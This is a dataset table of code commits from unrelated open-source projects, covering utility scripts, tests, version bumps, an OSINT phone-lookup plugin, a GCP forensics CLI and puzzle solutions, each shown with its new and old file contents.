commit stringlengths 40 40 | subject stringlengths 4 1.73k | repos stringlengths 5 127k | old_file stringlengths 2 751 | new_file stringlengths 2 751 | new_contents stringlengths 1 8.98k | old_contents stringlengths 0 6.59k | license stringclasses 13 values | lang stringclasses 23 values
---|---|---|---|---|---|---|---|---
1613bde53cfda3d38d7e62c6c91f3d6c5407fb9c | Add script inspect_checkpoint.py to check if a model checkpoint is corrupted with NaN/inf values | liyi193328/pointer-generator,liyi193328/pointer-generator,liyi193328/pointer-generator,abisee/pointer-generator | inspect_checkpoint.py | inspect_checkpoint.py | """
Simple script that checks if a checkpoint is corrupted with any inf/NaN values. Run like this:
python inspect_checkpoint.py model.12345
"""
import tensorflow as tf
import sys
import numpy as np
if __name__ == '__main__':
    if len(sys.argv) != 2:
        raise Exception("Usage: python inspect_checkpoint.py <file_name>\nNote: Do not include the .data .index or .meta part of the model checkpoint in file_name.")
    file_name = sys.argv[1]
    reader = tf.train.NewCheckpointReader(file_name)
    var_to_shape_map = reader.get_variable_to_shape_map()
    finite = []
    all_infnan = []
    some_infnan = []
    for key in sorted(var_to_shape_map.keys()):
        tensor = reader.get_tensor(key)
        if np.all(np.isfinite(tensor)):
            finite.append(key)
        else:
            if not np.any(np.isfinite(tensor)):
                all_infnan.append(key)
            else:
                some_infnan.append(key)
    print "\nFINITE VARIABLES:"
    for key in finite: print key
    print "\nVARIABLES THAT ARE ALL INF/NAN:"
    for key in all_infnan: print key
    print "\nVARIABLES THAT CONTAIN SOME FINITE, SOME INF/NAN VALUES:"
    for key in some_infnan: print key
    print ""
    if not all_infnan and not some_infnan:
        print "CHECK PASSED: checkpoint contains no inf/NaN values"
    else:
        print "CHECK FAILED: checkpoint contains some inf/NaN values"
| apache-2.0 | Python |
|
d5e16fdf73eb281da3541fa7a0e3f8792b83faeb | bump to 0.3.0 | ledgr/tproxy,benoitc/tproxy | tproxy/__init__.py | tproxy/__init__.py | # -*- coding: utf-8 -
#
# This file is part of tproxy released under the MIT license.
# See the NOTICE for more information.
version_info = (0, 3, 0)
__version__ = ".".join(map(str, version_info))
| # -*- coding: utf-8 -
#
# This file is part of tproxy released under the MIT license.
# See the NOTICE for more information.
version_info = (0, 2, 4)
__version__ = ".".join(map(str, version_info))
| mit | Python |
bb5a94208bb3a96995182b773998dbec4ebf7667 | Test wrapper py script | gracecox/EoSeval | py_scripts/EoSeval_test.py | py_scripts/EoSeval_test.py | # -*- coding: utf-8 -*-
"""
Code description goes in here
"""
import numpy
import EoSeq
from scipy.optimize import curve_fit
# Prompt user for filename string
# filename = raw_input("Please enter a file path for P and V data")
# Load in data file
# data = numpy.loadtxt(filename, delimiter = ',')
data = numpy.loadtxt("/Users/Grace/Documents/EoSeval/data/ferropericlase_Mao_2011_2000K.csv", delimiter = ',')
init_params = [0,0,0,0]
testfunc = BM3EOS(init_params)
BM3 = EOS(testfunc)
| mit | Python |
|
9a082b04973a9927014df496aa31f5c05e8be6ca | add 143 | ufjfeng/leetcode-jf-soln,ufjfeng/leetcode-jf-soln | python/143_reorder_list.py | python/143_reorder_list.py | """
Given a singly linked list L: L0→L1→…→Ln-1→Ln,
reorder it to: L0→Ln→L1→Ln-1→L2→Ln-2→…
You must do this in-place without altering the nodes' values.
For example,
Given {1,2,3,4}, reorder it to {1,4,2,3}.
"""
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
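# Approach: find the list middle with slow/fast pointers, reverse the second
# half in place, then interleave the two halves node by node.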
class Solution(object):
    def reorderList(self, head):
        """
        :type head: ListNode
        :rtype: void Do not return anything, modify head in-place instead.
        """
        if not head or not head.next:
            return
        slow, fast = head, head.next
        while fast and fast.next:
            slow = slow.next
            fast = fast.next.next
        middlehead = slow.next
        slow.next = None
        if middlehead and middlehead.next:
            pre = middlehead
            cur = middlehead.next
            nxt = middlehead.next.next
            pre.next = None
            while nxt:
                cur.next = pre
                pre = cur
                cur = nxt
                nxt = nxt.next
            cur.next = pre
            head2 = cur
        elif middlehead:
            head2 = middlehead
        p, q = head, head2
        tmp1 = head.next
        tmp2 = head2.next
        while tmp1 and tmp2:
            p.next = q
            q.next = tmp1
            p, q = tmp1, tmp2
            tmp1, tmp2 = tmp1.next, tmp2.next
        p.next = q
        if tmp1:
            q.next = tmp1
from singlyLinkedList import singlyLinkedList
a = singlyLinkedList([1,2,3,4,5,6])
a.printNodes()
soln = Solution()
soln.reorderList(a.head)
a.printNodes()
| mit | Python |
|
c91c8f56940ba60190f771ef7731169e68b2053e | Create functions.py | ahmedkhaled4d/FCIH,ahmedkhaled4d/FCIH,ahmedkhaled4d/ajax_pagination,ahmedkhaled4d/FCIH | python/openCV/functions.py | python/openCV/functions.py | import numpy as np
import cv2
def nothing():
    pass
def Rvalue(x):
    #print('R=',x)
    return x
def Gvalue(x):
    #print('G=',x)
    return x
def Bvalue(x):
    #print('B=',x)
    return x
img = np.zeros((512, 512, 3), np.uint8)
drawing = False # true if mouse is pressed
mode = True # if True, draw rectangle. Press 'm' to toggle to curve
ix,iy = -1,-1
def draw_circle(event,x,y,flags,param):
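    # Mouse-callback state machine: button-down starts a drag at (ix, iy),
    # mouse-move previews the shape while dragging (rectangle or circle
    # depending on mode), and button-up draws the final shape.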
    global ix,iy,drawing,mode
    if event == cv2.EVENT_LBUTTONDOWN:
        drawing = True
        ix,iy = x,y
    elif event == cv2.EVENT_MOUSEMOVE:
        if drawing == True:
            if mode == True:
                cv2.rectangle(img,(ix,iy),(x,y),(0,255,0),-1)
            else:
                cv2.circle(img,(x,y),5,(0,0,255),-1)
    elif event == cv2.EVENT_LBUTTONUP:
        drawing = False
        if mode == True:
            cv2.rectangle(img,(ix,iy),(x,y),(0,255,0),-1)
        else:
            cv2.circle(img,(x,y),5,(0,0,255),-1)
def freePint():
    global mode  # the switch below toggles the module-level drawing mode
    cv2.namedWindow('image')
    switch = '0 : OFF \n1 : ON'
    cv2.createTrackbar(switch, 'image', 0, 1, nothing)
    cv2.setMouseCallback('image', draw_circle)
    while (1):
        cv2.imshow('image', img)
        s = cv2.getTrackbarPos(switch, 'image')
        k = cv2.waitKey(1)
        if s == 0:
            mode = False
        if s == 1:
            mode = True
        elif k == 27:
            break
    cv2.destroyAllWindows()
def trackbar():
    # Create a black image, a window
    img = np.zeros((300,512,3), np.uint8)
    cv2.namedWindow('image')
    # create trackbars for color change
    cv2.createTrackbar('R','image',0,255,Rvalue)
    cv2.createTrackbar('G','image',0,255,Gvalue)
    cv2.createTrackbar('B','image',0,255,Bvalue)
    # create switch for ON/OFF functionality
    switch = '0 : OFF \n1 : ON'
    cv2.createTrackbar(switch, 'image',0,1,nothing)
    while(1):
        cv2.imshow('image',img)
        k = cv2.waitKey(1)
        if k == 27:
            break
        # get current positions of four trackbars
        r = cv2.getTrackbarPos('R','image')
        g = cv2.getTrackbarPos('G','image')
        b = cv2.getTrackbarPos('B','image')
        s = cv2.getTrackbarPos(switch,'image')
        if s == 0:
            img[:] = 0
        else:
            img[:] = [b,g,r]
    cv2.destroyAllWindows()
def dcircle():
    trackbar()
    img = np.zeros((512, 512, 3), np.uint8)
    # Rvalue/Gvalue/Bvalue are trackbar callbacks, not numbers, so draw with
    # a fixed BGR color here.
    img = cv2.circle(img, (447, 63), 63, (255, 0, 0), -1)
    cv2.imshow('figer circle', img)
def print_func(par):
return ("Hello" , par);
def drowit():
# Create a black image
img = np.zeros((512, 512, 3), np.uint8)
# cv2.imshow('fig1',img)
# cv2.waitKey()
# Draw a diagonal blue line with thickness of 5 px
img = cv2.line(img, (0, 0), (511, 511), (255, 0, 0), 10)
img = cv2.rectangle(img, (384, 0), (510, 128), (0, 255, 0), 3)
img = cv2.circle(img, (447, 63), 63, (0, 120, 255), -1)
font = cv2.FONT_HERSHEY_SIMPLEX
cv2.putText(img, 'OpenCV', (10, 500), font, 4, (255, 255, 255), 2)
cv2.imshow('fig1', img)
def saveimage ():
cv2.imwrite("image_processed.png", img) #the name of new image
| mit | Python |
|
38756d3fd7ac1d858d45f256e8d4ad118ecbf531 | add basic admin file | emencia/emencia-django-socialaggregator | emencia/django/socialaggregator/admin.py | emencia/django/socialaggregator/admin.py | """Admin for parrot.gallery"""
from django.contrib import admin
from django.utils.translation import ugettext_lazy as _
from emencia.django.socialaggregator.models import Feed
from emencia.django.socialaggregator.models import Aggregator
from emencia.django.socialaggregator.models import Ressource
class FeedAdmin(admin.ModelAdmin):
    pass
admin.site.register(Feed, FeedAdmin)
class AggregatorAdmin(admin.ModelAdmin):
    pass
admin.site.register(Aggregator, AggregatorAdmin)
class RessourceAdmin(admin.ModelAdmin):
    pass
admin.site.register(Ressource, RessourceAdmin)
| agpl-3.0 | Python |
|
d53ec3fefddda14e6d7fad466f5e81d3ed369330 | Add sfp_numverify module | smicallef/spiderfoot,smicallef/spiderfoot,smicallef/spiderfoot | modules/sfp_numverify.py | modules/sfp_numverify.py | #-------------------------------------------------------------------------------
# Name: sfp_numverify
# Purpose: SpiderFoot plug-in to search numverify.com API for a phone number
# and retrieve location and carrier information.
#
# Author: <[email protected]>
#
# Created: 2019-05-25
# Copyright: (c) bcoles 2019
# Licence: GPL
#-------------------------------------------------------------------------------
import json
import re
import urllib
import time
from sflib import SpiderFoot, SpiderFootPlugin, SpiderFootEvent
class sfp_numverify(SpiderFootPlugin):
"""numverify:Footprint,Investigate,Passive:Real World::Lookup phone number location and carrier information."""
# Default options
opts = {
'api_key': ''
}
# Option descriptions
optdescs = {
'api_key': 'numverify API key.'
}
results = dict()
errorState = False
def setup(self, sfc, userOpts=dict()):
self.sf = sfc
self.__dataSource__ = "numverify"
self.results = dict()
self.errorState = False
for opt in userOpts.keys():
self.opts[opt] = userOpts[opt]
# What events is this module interested in for input
def watchedEvents(self):
return ['PHONE_NUMBER']
# What events this module produces
def producedEvents(self):
return ['RAW_RIR_DATA', 'GEOINFO', 'PROVIDER_TELCO']
# Query numverify API for the specified phone number
# https://numverify.com/documentation
def query(self, qry):
number = qry.strip('+').strip('(').strip(')')
params = {
'number': number.encode('raw_unicode_escape'),
'country_code': '',
'format': '0', # set to "1" for prettified debug output
'access_key': self.opts['api_key']
}
# Free API does not support HTTPS for no adequately explained reason
res = self.sf.fetchUrl("http://apilayer.net/api/validate?" + urllib.urlencode(params),
timeout=self.opts['_fetchtimeout'],
useragent=self.opts['_useragent'])
time.sleep(1)
if res['content'] is None:
self.sf.debug('No response from apilayer.net')
return None
if res['code'] == '101':
self.sf.error('API error: invalid API key', False)
self.errorState = True
return None
if res['code'] == '102':
self.sf.error('API error: user account deactivated', False)
self.errorState = True
return None
if res['code'] == '104':
self.sf.error('API error: usage limit exceeded', False)
self.errorState = True
return None
try:
data = json.loads(res['content'])
except BaseException as e:
self.sf.debug('Error processing JSON response: ' + str(e))
return None
if data.get('error') is not None:
self.sf.error('API error: ' + str(data.get('error')), False)
return None
return data
# Handle events sent to this module
def handleEvent(self, event):
eventName = event.eventType
srcModuleName = event.module
eventData = event.data
if self.errorState:
return None
if self.opts['api_key'] == "":
self.sf.error("You enabled sfp_numverify but did not set an API key!", False)
self.errorState = True
return None
if eventData in self.results:
return None
self.results[eventData] = True
self.sf.debug("Received event, " + eventName + ", from " + srcModuleName)
data = self.query(eventData)
if data is None:
self.sf.debug("No phone information found for " + eventData)
return None
evt = SpiderFootEvent("RAW_RIR_DATA", str(data), self.__name__, event)
self.notifyListeners(evt)
if data.get('location') is not None and data.get('country_code') is not None:
location = data.get('location') + ', ' + data.get('country_code')
evt = SpiderFootEvent("GEOINFO", location, self.__name__, event)
self.notifyListeners(evt)
else:
self.sf.debug("No location information found for " + eventData)
if data.get('carrier') is not None:
evt = SpiderFootEvent("PROVIDER_TELCO", data.get('carrier'), self.__name__, event)
self.notifyListeners(evt)
else:
self.sf.debug("No carrier information found for " + eventData)
# End of sfp_numverify class
| mit | Python |
|
8b7db3fc9b90897c0e8da6d6b63d12e79754c625 | Solve Knowit2019/19 | matslindh/codingchallenges,matslindh/codingchallenges | knowit2019/19.py | knowit2019/19.py | def hidden_palindrome(n):
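    # A "hidden palindrome": n is not itself a palindrome, but n plus its
    # digit-reversal is (e.g. 38 + 83 = 121).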
    n_s = str(n)
    if n_s == n_s[::-1]:
        return False
    s = str(n + int(n_s[::-1]))
    return s == s[::-1]
def test_hidden_palindrome():
    assert hidden_palindrome(38)
    assert not hidden_palindrome(49)
if __name__ == '__main__':
    s = 0
    for x in range(1, 123454321+1):
        if x % 1000000 == 0:
            print(x)
        s += x if hidden_palindrome(x) else 0
    print(s)
|
f5d4fa76c7ea97af5cd30a3840835e6b97dd0721 | Add release script. (#162) | databricks/tensorframes,tjhunter/tensorframes,databricks/tensorframes,tjhunter/tensorframes | dev/release.py | dev/release.py | #!/usr/bin/env python
import click
from datetime import datetime
from subprocess import call, check_call, check_output, PIPE
import sys
DATABRICKS_REMOTE = "[email protected]:databricks/tensorframes.git"
PUBLISH_MODES = {
    "local": "tfs_testing/publishLocal",
    "m2": "tfs_testing/publishM2",
    "spark-package-publish": "distribution/spPublish",
}
WORKING_BRANCH = "WORKING_BRANCH_RELEASE_%s_@%s"
# lower case "z" puts the branch at the end of the github UI.
RELEASE_TAG = "v%s"
def prominentPrint(x):
    click.echo(click.style(x, underline=True))
def verify(prompt, interactive):
    if not interactive:
        return True
    return click.confirm(prompt, show_default=True)
@click.command()
@click.argument("release-version", type=str)
@click.argument("next-version", type=str)
@click.option("--publish-to", default="local", show_default=True,
help="Where to publish artifact, one of: %s" % list(PUBLISH_MODES.keys()))
@click.option("--no-prompt", is_flag=True, help="Automated mode with no user prompts.")
@click.option("--git-remote", default=DATABRICKS_REMOTE,
help="Push current branch and docs to this git remote.")
def main(release_version, next_version, publish_to, no_prompt, git_remote):
    interactive = not no_prompt
    time = datetime.now().strftime("%Y-%m-%dT%H-%M-%S")
    if publish_to not in PUBLISH_MODES:
        modes = list(PUBLISH_MODES.keys())
        prominentPrint("Unknown publish target, --publish-to should be one of: %s." % modes)
        sys.exit(1)
    if not next_version.endswith("SNAPSHOT"):
        next_version += "-SNAPSHOT"
    if not verify("Publishing version: %s\n"
                  "Next version will be: %s\n"
                  "Continue?" % (release_version, next_version), interactive):
        sys.exit(1)
    current_branch = check_output(["git", "rev-parse", "--abbrev-ref", "HEAD"]).strip()
    if current_branch == "HEAD":
        prominentPrint("Cannot build from detached head state. Please make a branch.")
        sys.exit(1)
    if current_branch != b"master":
        if not verify("You're not on the master branch do you want to continue?",
                      interactive):
            sys.exit(1)
    uncommitted_changes = check_output(["git", "diff", "--stat"])
    if uncommitted_changes != b"":
        prominentPrint("There seem to be uncommitted changes on your current branch. Please commit or "
                       "stash them and try again.")
        prominentPrint(uncommitted_changes)
        sys.exit(1)
    if call(["which", "protoc"], stdout=PIPE, stderr=PIPE) != 0:
        prominentPrint("Cannot find protoc, protoc is required to build tensorframes. See README.md.")
        sys.exit(1)
    working_branch = WORKING_BRANCH % (release_version, time)
    release_tag = RELEASE_TAG % release_version
    target_tags = [release_tag]
    existing_tags = check_output(["git", "tag"]).decode().split()
    conflict_tags = list(filter(lambda a: a in existing_tags, target_tags))
    if conflict_tags:
        msg = ("The following tags already exist:\n"
               " %s\n"
               "Please delete them and try.")
        msg = msg % "\n ".join(conflict_tags)
        prominentPrint(msg)
        sys.exit(1)
    prominentPrint("Creating working branch for this release.")
    check_call(["git", "checkout", "-b", working_branch])
    prominentPrint("Creating release tag and updating snapshot version.")
    update_version = "release release-version %s next-version %s" % (release_version, next_version)
    check_call(["./build/sbt", update_version])
    prominentPrint("Building and testing with sbt.")
    check_call(["git", "checkout", release_tag])
    publish_target = PUBLISH_MODES[publish_to]
    check_call(["./build/sbt", "clean", publish_target])
    prominentPrint("Updating local branch: %s" % current_branch)
    check_call(["git", "checkout", current_branch])
    check_call(["git", "merge", "--ff", working_branch])
    check_call(["git", "branch", "-d", working_branch])
    prominentPrint("Local branch updated")
    if verify("Would you like to push local branch & version tag to remote: %s?" % git_remote,
              interactive):
        check_call(["git", "push", git_remote, current_branch])
        check_call(["git", "push", git_remote, release_tag])
if __name__ == "__main__":
    main()
| apache-2.0 | Python |
|
58d19ea654e0c8d250f46b0d72191e48b4bc8588 | add tests for encryption/decryption in awx.main.utils.common | wwitzel3/awx,wwitzel3/awx,wwitzel3/awx,snahelou/awx,snahelou/awx,snahelou/awx,snahelou/awx,wwitzel3/awx | awx/main/tests/unit/common/test_common.py | awx/main/tests/unit/common/test_common.py | from awx.conf.models import Setting
from awx.main.utils import common
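# Note: the expected ciphertext differs with and without a pk, which suggests
# the instance pk feeds into the key derivation.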
def test_encrypt_field():
    field = Setting(pk=123, value='ANSIBLE')
    encrypted = common.encrypt_field(field, 'value')
    assert encrypted == '$encrypted$AES$Ey83gcmMuBBT1OEq2lepnw=='
    assert common.decrypt_field(field, 'value') == 'ANSIBLE'
def test_encrypt_field_without_pk():
    field = Setting(value='ANSIBLE')
    encrypted = common.encrypt_field(field, 'value')
    assert encrypted == '$encrypted$AES$8uIzEoGyY6QJwoTWbMFGhw=='
    assert common.decrypt_field(field, 'value') == 'ANSIBLE'
def test_encrypt_subfield():
    field = Setting(value={'name': 'ANSIBLE'})
    encrypted = common.encrypt_field(field, 'value', subfield='name')
    assert encrypted == '$encrypted$AES$8uIzEoGyY6QJwoTWbMFGhw=='
    assert common.decrypt_field(field, 'value', subfield='name') == 'ANSIBLE'
def test_encrypt_field_with_ask():
    encrypted = common.encrypt_field(Setting(value='ASK'), 'value', ask=True)
    assert encrypted == 'ASK'
def test_encrypt_field_with_empty_value():
    encrypted = common.encrypt_field(Setting(value=None), 'value')
    assert encrypted is None
|
8ae3e44b0a43f382c98194b9caa097b62de899ef | Add script to save ner data to a csv file | WhatWorksWhenForWhom/nlppln,WhatWorksWhenForWhom/nlppln,WhatWorksWhenForWhom/nlppln | nlpppln/save_ner_data.py | nlpppln/save_ner_data.py | #!/usr/bin/env python
import click
import os
import codecs
import json
import pandas as pd
@click.command()
@click.argument('input_dir', type=click.Path(exists=True))
@click.argument('output_file', type=click.Path())
def nerstats(input_dir, output_file):
    output_dir = os.path.dirname(output_file)
    if not os.path.exists(output_dir):
        os.makedirs(output_dir)
    frames = []
    files = os.listdir(input_dir)
    for fi in files:
        with codecs.open(os.path.join(input_dir, fi), encoding='utf-8') as f:
            saf = json.load(f)
            data = {}
            data['word'] = [t['word'] for t in saf['tokens'] if 'ne' in t.keys()]
            data['ner'] = [t['ne'] for t in saf['tokens'] if 'ne' in t.keys()]
            data['w_id'] = [t['id'] for t in saf['tokens'] if 'ne' in t.keys()]
            data['text'] = [fi for t in saf['tokens'] if 'ne' in t.keys()]
            frames.append(pd.DataFrame(data=data))
    df = pd.concat(frames, ignore_index=True)
    df.to_csv(output_file)
if __name__ == '__main__':
    nerstats()
| apache-2.0 | Python |
|
46a40e7e8fc424cc7e7a601fc99ab2d852cd0980 | Add example GCP CLI tool. (#69) | google/cloud-forensics-utils,google/cloud-forensics-utils | examples/gcp_cli.py | examples/gcp_cli.py | # -*- coding: utf-8 -*-
# Copyright 2020 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Demo CLI tool for GCP."""
import argparse
from libcloudforensics import gcp
def ListInstances(args):
"""List GCE instances in GCP project.
Args:
args (dict): Arguments from ArgumentParser.
"""
project = gcp.GoogleCloudProject(args.project)
instances = project.ListInstances()
print('Instances found:')
for instance in instances:
bootdisk_name = instances[instance].GetBootDisk().name
print('Name: {0:s}, Bootdisk: {1:s}'.format(instance, bootdisk_name))
def ListDisks(args):
"""List GCE disks in GCP project.
Args:
args (dict): Arguments from ArgumentParser.
"""
project = gcp.GoogleCloudProject(args.project)
disks = project.ListDisks()
print('Disks found:')
for disk in disks:
print('Name: {0:s}, Zone: {1:s}'.format(disk, disks[disk].zone))
def CreateDiskCopy(args):
"""Copy GCE disks to other GCP project.
Args:
args (dict): Arguments from ArgumentParser.
"""
disk = gcp.CreateDiskCopy(
args.project, args.dstproject, args.instancename, args.zone)
print('Disk copy completed.')
print('Name: {0:s}'.format(disk.name))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Demo CLI tool for GCP')
parser.add_argument('--project', help='The GCP project name')
subparsers = parser.add_subparsers()
parser_listdisks = subparsers.add_parser('listdisks')
parser_listdisks.set_defaults(func=ListDisks)
parser_listdisks = subparsers.add_parser('listinstances')
parser_listdisks.set_defaults(func=ListInstances)
parser_creatediskcopy = subparsers.add_parser('creatediskcopy')
parser_creatediskcopy.add_argument(
'--dstproject', help='Destination GCP project')
parser_creatediskcopy.add_argument('--zone', help='Zone to create disk in')
parser_creatediskcopy.add_argument(
'--instancename', help='Instance to copy disk from')
parser_creatediskcopy.set_defaults(func=CreateDiskCopy)
parsed_args = parser.parse_args()
if parsed_args.func:
parsed_args.func(parsed_args)
| apache-2.0 | Python |
|
9cc4067d581f6a97136e0f186dc8aa1dbc734e47 | verify that the dynamic oracle for ArcEager can reach all projective parses | andersjo/hals | hals/transition_system/arc_eager_test.py | hals/transition_system/arc_eager_test.py | from copy import copy, deepcopy
import numpy as np
from unittest import TestCase
from transition_system.arc_eager import ArcEager, ArcEagerDynamicOracle
def generate_all_projective_parses(size):
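    # Exhaustive DFS over the transition system: every complete action
    # sequence from the initial state yields one projective parse.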
    arc_eager = ArcEager(1)
    initial = arc_eager.state(size)
    stack = []
    stack.append(initial)
    parses = set()
    while len(stack):
        state = stack.pop()
        if arc_eager.is_final(state):
            heads, labels = arc_eager.extract_parse(state)
            parses.add(tuple(heads))
        else:
            for action in arc_eager.allowed(state):
                state_copy = deepcopy(state)
                arc_eager.perform(state_copy, action)
                stack.append(state_copy)
    return parses
class MockSentence:
    def __init__(self, num_tokens):
        self.adjacency = np.zeros((num_tokens, num_tokens), dtype=bool)
class TestArcEager(TestCase):
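    # The oracle is complete if, for every reachable projective parse,
    # greedily following zero-cost actions reproduces that exact parse.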
    def test_dynamic_oracle_is_complete(self):
        SIZE = 4
        arc_eager = ArcEager(1)
        dyn_oracle = ArcEagerDynamicOracle()
        valid_parses = generate_all_projective_parses(SIZE)
        for valid_parse in valid_parses:
            sent = MockSentence(len(valid_parse) + 1)
            for v, u in enumerate(valid_parse):
                sent.adjacency[u, v] = True
            state = arc_eager.state(SIZE)
            while not arc_eager.is_final(state):
                allowed_actions = arc_eager.allowed(state)
                costs = dyn_oracle(state, sent, allowed_actions)
                self.assertEqual(costs.min(), 0)
                index = costs.argmin()
                arc_eager.perform(state, allowed_actions[index])
            heads, labels = arc_eager.extract_parse(state)
            self.assertEqual(tuple(heads), valid_parse)
|
db380d8e6a8dfa5444f82a0978fad3494d923278 | Add tests of generate_matrix | hvy/chainer,chainer/chainer,niboshi/chainer,chainer/chainer,chainer/chainer,niboshi/chainer,niboshi/chainer,chainer/chainer,wkentaro/chainer,hvy/chainer,niboshi/chainer,pfnet/chainer,hvy/chainer,wkentaro/chainer,hvy/chainer,wkentaro/chainer,wkentaro/chainer | tests/chainer_tests/testing_tests/test_matrix.py | tests/chainer_tests/testing_tests/test_matrix.py | import unittest
import numpy
from chainer import testing
from chainer.testing import condition
@testing.parameterize(*testing.product({
'dtype': [
numpy.float16, numpy.float32, numpy.float64,
numpy.complex64, numpy.complex128,
],
'x_s_shapes': [
((2, 2), (2,)),
((2, 3), (2,)),
((3, 2), (2,)),
((2, 3, 4), (2, 3)),
((2, 4, 3), (2, 3)),
((0, 2, 3), (0, 2)),
],
}))
class TestGenerateMatrix(unittest.TestCase):
def test_generate_matrix(self):
dtype = self.dtype
x_shape, s_shape = self.x_s_shapes
sv = 0.5 + numpy.random.random(s_shape).astype(dtype().real.dtype)
x = testing.generate_matrix(x_shape, dtype=dtype, singular_values=sv)
assert x.shape == x_shape
s = numpy.linalg.svd(
x.astype(numpy.complex128), full_matrices=False, compute_uv=False,
)
sv_sorted = numpy.sort(sv, axis=-1)[..., ::-1]
rtol = 1e-3 if dtype == numpy.float16 else 1e-7
numpy.testing.assert_allclose(s, sv_sorted, rtol=rtol)
class TestGenerateMatrixInvalid(unittest.TestCase):
def test_no_singular_values(self):
with self.assertRaises(TypeError):
testing.generate_matrix((2, 2))
def test_invalid_shape(self):
with self.assertRaises(ValueError):
testing.generate_matrix((2,), singular_values=1)
def test_invalid_dtype(self):
with self.assertRaises(ValueError):
testing.generate_matrix(
(2, 2), dtype=numpy.int32, singular_values=1)
def test_shape_mismatch(self):
with self.assertRaises(ValueError):
testing.generate_matrix(
(2, 2), singular_values=numpy.ones(3))
testing.run_module(__name__, __file__)
| mit | Python |
|
3cad51e08ef4c1dcfb11cbb8c32272328b31015a | Prepare v1.2.306.dev | gazpachoking/Flexget,ZefQ/Flexget,tarzasai/Flexget,ZefQ/Flexget,tobinjt/Flexget,OmgOhnoes/Flexget,ianstalk/Flexget,malkavi/Flexget,poulpito/Flexget,ratoaq2/Flexget,poulpito/Flexget,crawln45/Flexget,antivirtel/Flexget,jawilson/Flexget,cvium/Flexget,oxc/Flexget,qvazzler/Flexget,dsemi/Flexget,LynxyssCZ/Flexget,malkavi/Flexget,dsemi/Flexget,Flexget/Flexget,xfouloux/Flexget,Danfocus/Flexget,gazpachoking/Flexget,tarzasai/Flexget,OmgOhnoes/Flexget,drwyrm/Flexget,LynxyssCZ/Flexget,Danfocus/Flexget,Flexget/Flexget,cvium/Flexget,tobinjt/Flexget,qvazzler/Flexget,ZefQ/Flexget,jawilson/Flexget,jawilson/Flexget,malkavi/Flexget,qvazzler/Flexget,tarzasai/Flexget,tsnoam/Flexget,jacobmetrick/Flexget,jawilson/Flexget,spencerjanssen/Flexget,offbyone/Flexget,qk4l/Flexget,JorisDeRieck/Flexget,Pretagonist/Flexget,Danfocus/Flexget,lildadou/Flexget,xfouloux/Flexget,ianstalk/Flexget,crawln45/Flexget,LynxyssCZ/Flexget,xfouloux/Flexget,ibrahimkarahan/Flexget,OmgOhnoes/Flexget,ibrahimkarahan/Flexget,dsemi/Flexget,Danfocus/Flexget,jacobmetrick/Flexget,sean797/Flexget,thalamus/Flexget,ratoaq2/Flexget,qk4l/Flexget,Flexget/Flexget,ibrahimkarahan/Flexget,Pretagonist/Flexget,drwyrm/Flexget,Flexget/Flexget,qk4l/Flexget,sean797/Flexget,offbyone/Flexget,tobinjt/Flexget,tsnoam/Flexget,ianstalk/Flexget,patsissons/Flexget,JorisDeRieck/Flexget,cvium/Flexget,patsissons/Flexget,patsissons/Flexget,offbyone/Flexget,thalamus/Flexget,spencerjanssen/Flexget,antivirtel/Flexget,jacobmetrick/Flexget,malkavi/Flexget,drwyrm/Flexget,lildadou/Flexget,tobinjt/Flexget,antivirtel/Flexget,tsnoam/Flexget,spencerjanssen/Flexget,oxc/Flexget,Pretagonist/Flexget,LynxyssCZ/Flexget,oxc/Flexget,poulpito/Flexget,JorisDeRieck/Flexget,ratoaq2/Flexget,crawln45/Flexget,sean797/Flexget,grrr2/Flexget,lildadou/Flexget,thalamus/Flexget,crawln45/Flexget,grrr2/Flexget,JorisDeRieck/Flexget,grrr2/Flexget | flexget/_version.py | flexget/_version.py | """
Current FlexGet version.
This is contained in a separate file so that it can be easily read by setup.py, and easily edited and committed by
release scripts in continuous integration. Should (almost) never be set manually.
The version should always be set to the <next release version>.dev
The jenkins release job will automatically strip the .dev for release,
and update the version again for continued development.
"""
__version__ = '1.2.306.dev'
| """
Current FlexGet version.
This is contained in a separate file so that it can be easily read by setup.py, and easily edited and committed by
release scripts in continuous integration. Should (almost) never be set manually.
The version should always be set to the <next release version>.dev
The jenkins release job will automatically strip the .dev for release,
and update the version again for continued development.
"""
__version__ = '1.2.305'
| mit | Python |
05e7db377b7f0224ec97d5f96c387d711e1e0f23 | Add problem | mikefeneley/topcoder | src/SRM-144/time.py | src/SRM-144/time.py |
class Time:
    def whatTime(self, seconds):
        hours = seconds / 3600
        a = 3600
        leftover = seconds - hours * 3600
        minutes = leftover / 60
        final_sec = seconds - hours * 3600 - minutes * 60
        final = str(hours) + ":" + str(minutes) + ":" + str(final_sec)
        return final
| mit | Python |
|
61f542c215c0b45bf8b4121bc4705c760c334aa9 | Add a SetObjectExtruderOperation class | Curahelper/Cura,hmflash/Cura,hmflash/Cura,fieldOfView/Cura,fieldOfView/Cura,ynotstartups/Wanhao,Curahelper/Cura,ynotstartups/Wanhao | cura/Settings/SetObjectExtruderOperation.py | cura/Settings/SetObjectExtruderOperation.py | # Copyright (c) 2017 Ultimaker B.V.
# Cura is released under the terms of the AGPLv3 or higher.
from UM.Scene.SceneNode import SceneNode
from UM.Operations.Operation import Operation
from cura.Settings.SettingOverrideDecorator import SettingOverrideDecorator
## Simple operation to set the extruder a certain object should be printed with.
class SetObjectExtruderOperation(Operation):
    def __init__(self, node: SceneNode, extruder_id: str) -> None:
        self._node = node
        self._extruder_id = extruder_id
        self._previous_extruder_id = None
        self._decorator_added = False
    def undo(self):
        if self._previous_extruder_id:
            self._node.callDecoration("setActiveExtruder", self._previous_extruder_id)
    def redo(self):
        stack = self._node.callDecoration("getStack") #Don't try to get the active extruder since it may be None anyway.
        if not stack:
            self._node.addDecorator(SettingOverrideDecorator())
        self._previous_extruder_id = self._node.callDecoration("getActiveExtruder")
        self._node.callDecoration("setActiveExtruder", self._extruder_id)
| agpl-3.0 | Python |
|
